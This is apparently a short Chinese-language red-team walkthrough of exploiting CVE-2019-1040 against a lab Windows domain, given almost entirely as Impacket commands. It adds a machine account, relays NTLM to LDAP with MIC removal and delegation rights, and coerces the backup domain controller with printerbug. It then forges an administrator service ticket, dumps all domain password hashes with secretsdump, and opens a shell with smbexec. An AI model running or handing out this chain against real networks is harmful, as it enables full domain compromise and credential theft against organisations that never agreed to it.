CVE-2019-1040
创建机器主机账号
python3 addcomputer.py -method SAMR -dc-ip 192.168.145.128 -computer-name coleak2 -computer-pass pass@123 "redteam.club/hack:pass@123"中继&委派
执行ntlmrelayx.py脚本进行NTLM中继,设置SMB服务器并将认证凭据中继到LDAP协议。其中–remove-mic选项用于清除MIC标志,–escalate-user用于提升指定用户权限
python3 ntlmrelayx.py -t ldap://192.168.145.128 -smb2support --remove-mic --delegate-access --escalate-user coleak2\$ -debug
或者
python3 ntlmrelayx.py --escalate-user coleak2 -t ldap://192.168.145.128 -smb2support --remove-mic --delegate-access域控有两台域控 192.168.145.128 主控 192.168.145.129是备份域控 192.168.145.135是中继主机(kali)
python3 printerbug.py redteam.club/hack:pass@123@192.168.145.129 192.168.145.135获取服务票据
python3 getST.py -dc-ip 192.168.145.128 redteam/coleak1\$:pass@123 -spn cifs/ad2.redteam.club -impersonate administrator配置环境变量
export KRB5CCNAME=administrator.ccache
vi /etc/resolv.conf导出hash,以下命令都是导出hash,一个指定用户,一个导出所有用户的hash
python3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-user administrator
python3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-ntlm
有了hash就可以做很多事了,访问 ad2 试一下
python3 smbexec.py -no-pass -k ad2.redteam.club
